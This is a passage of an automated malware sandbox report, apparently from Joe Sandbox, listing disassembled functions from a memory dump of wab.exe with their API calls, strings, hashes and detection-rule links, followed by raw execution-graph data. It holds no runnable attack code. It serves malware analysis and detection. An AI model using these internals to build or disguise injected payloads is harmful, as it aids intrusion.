                  • memset.MSVCRT ref: 00417B7B
                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                  • GetLastError.KERNEL32 ref: 00417BB5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ErrorLastLockUnlockmemset
                  • String ID:
                  • API String ID: 3727323765-0
                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                  Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                  • malloc.MSVCRT ref: 00417407
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@malloc
                  • String ID:
                  • API String ID: 4284152360-0
                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                  Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040F673
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                  • strlen.MSVCRT ref: 0040F6A2
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                  Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040F6E2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                  • strlen.MSVCRT ref: 0040F70D
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                  Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00402FD7
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                  • strlen.MSVCRT ref: 00403006
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                  Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                  • GetStockObject.GDI32(00000000), ref: 004143C6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                  • String ID:
                  • API String ID: 764393265-0
                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                  Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                  Download Yara Rule
                  APIs
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Time$System$File$LocalSpecific
                  • String ID:
                  • API String ID: 979780441-0
                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                  Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • memcpy.MSVCRT ref: 004134E0
                  • memcpy.MSVCRT ref: 004134F2
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$DialogHandleModuleParam
                  • String ID:
                  • API String ID: 1386444988-0
                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                  Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                  Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: InvalidateMessageRectSend
                  • String ID: d=E
                  • API String ID: 909852535-3703654223
                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                  Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                  Download Yara Rule
                  APIs
                  • wcschr.MSVCRT ref: 0040F79E
                  • wcschr.MSVCRT ref: 0040F7AC
                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcschr$memcpywcslen
                  • String ID: "
                  • API String ID: 1983396471-123907689
                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                  Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                  • _memicmp.MSVCRT ref: 0040C00D
                  • memcpy.MSVCRT ref: 0040C024
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FilePointer_memicmpmemcpy
                  • String ID: URL
                  • API String ID: 2108176848-3574463123
                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                  Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfmemcpy
                  • String ID: %2.2X
                  • API String ID: 2789212964-323797159
                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                  Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf
                  • String ID: %%-%d.%ds
                  • API String ID: 3988819677-2008345750
                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                  Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040E770
                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSendmemset
                  • String ID: F^@
                  • API String ID: 568519121-3652327722
                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                  Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PlacementWindowmemset
                  • String ID: WinPos
                  • API String ID: 4036792311-2823255486
                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                  Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • wcsrchr.MSVCRT ref: 0040DCE9
                  • wcscat.MSVCRT ref: 0040DCFF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleNamewcscatwcsrchr
                  • String ID: _lng.ini
                  • API String ID: 383090722-1948609170
                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                  Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                  • API String ID: 2773794195-880857682
                  • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                  • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                  Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                  Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                  Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                  • memcmp.MSVCRT ref: 00408AF3
                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                  • memcmp.MSVCRT ref: 00408B2B
                  • memcmp.MSVCRT ref: 00408B5C
                  • memcpy.MSVCRT ref: 00408B79
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID:
                  • API String ID: 231171946-0
                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                  Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcslen$wcscat$wcscpy
                  • String ID:
                  • API String ID: 1961120804-0
                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                  Execution Graph

                  Execution Coverage:2.4%
                  Dynamic/Decrypted Code Coverage:20.4%
                  Signature Coverage:0.5%
                  Total number of Nodes:848
                  Total number of Limit Nodes:17
                  execution_graph 34110 40fc40 70 API calls 34283 403640 21 API calls 34111 427fa4 42 API calls 34284 412e43 _endthreadex 34285 425115 76 API calls __fprintf_l 34286 43fe40 133 API calls 34114 425115 83 API calls __fprintf_l 34115 401445 memcpy memcpy DialogBoxParamA 34116 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33243 444c68 __set_app_type __p__fmode __p__commode 33242->33243 33245 444cfa 33243->33245 33246 444d02 __setusermatherr 33245->33246 33247 444d0e 33245->33247 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33300 40cf64 33263->33300 33320 410d0e 33263->33320 33265 40cf6f 33324 40ccd7 ??2@YAPAXI 33265->33324 33267 40cf9b 33338 407cbc 33267->33338 33272 40cfc4 33356 409825 memset 33272->33356 33273 40cfd8 33361 4096f4 memset 33273->33361 33278 40d181 ??3@YAXPAX 33280 40d1b3 33278->33280 33281 40d19f DeleteObject 33278->33281 33279 407e30 _strcmpi 33282 40cfee 33279->33282 33385 407948 ??3@YAXPAX ??3@YAXPAX 33280->33385 33281->33280 33284 40cff2 RegDeleteKeyA 33282->33284 33285 40d007 EnumResourceTypesA 33282->33285 33284->33278 33287 40d047 33285->33287 33288 40d02f MessageBoxA 33285->33288 33286 40d1c4 33386 4080d4 ??3@YAXPAX 33286->33386 33290 40d0a0 CoInitialize 33287->33290 33366 40ce70 33287->33366 33288->33278 33383 40cc26 strncat memset RegisterClassA CreateWindowExA 33290->33383 33292 40d1cd 33387 407948 ??3@YAXPAX ??3@YAXPAX 33292->33387 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33384 40c256 PostMessageA 33295->33384 33297 40d061 ??3@YAXPAX 33297->33280 33301 40d084 DeleteObject 33297->33301 33298 40d09e 33298->33290 33300->33256 33300->33257 33301->33280 33304 40d0f9 GetMessageA 33305 40d17b 33304->33305 33306 40d10d 33304->33306 33305->33278 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404aec 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33318 404b13 33314->33318 33319 404afc MessageBoxA 33314->33319 33315->33316 33316->33314 33317 404ae8 33316->33317 33317->33314 33318->33263 33319->33263 33321 410d17 LoadLibraryA 33320->33321 33322 410d3c 33320->33322 33321->33322 33323 410d2b GetProcAddress 33321->33323 33322->33265 33323->33322 33325 40cd08 ??2@YAPAXI 33324->33325 33327 40cd26 33325->33327 33328 40cd2d 33325->33328 33395 404025 6 API calls 33327->33395 33330 40cd66 33328->33330 33331 40cd59 DeleteObject 33328->33331 33388 407088 33330->33388 33331->33330 33333 40cd6b 33391 4019b5 33333->33391 33336 4019b5 strncat 33337 40cdbf _mbscpy 33336->33337 33337->33267 33397 407948 ??3@YAXPAX ??3@YAXPAX 33338->33397 33340 407e04 33398 407a55 33340->33398 33343 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33350 407cf7 33343->33350 33344 407ddc 33344->33340 33410 407a1f 33344->33410 33346 407d7a ??3@YAXPAX 33346->33350 33350->33340 33350->33343 33350->33344 33350->33346 33401 40796e 7 API calls 33350->33401 33402 406f30 33350->33402 33352 407e30 33353 407e57 33352->33353 33354 407e38 33352->33354 33353->33272 33353->33273 33354->33353 33355 407e41 _strcmpi 33354->33355 33355->33353 33355->33354 33416 4097ff 33356->33416 33358 409854 33421 409731 33358->33421 33362 4097ff 3 API calls 33361->33362 33363 409723 33362->33363 33441 40966c 33363->33441 33455 4023b2 33366->33455 33372 40ced3 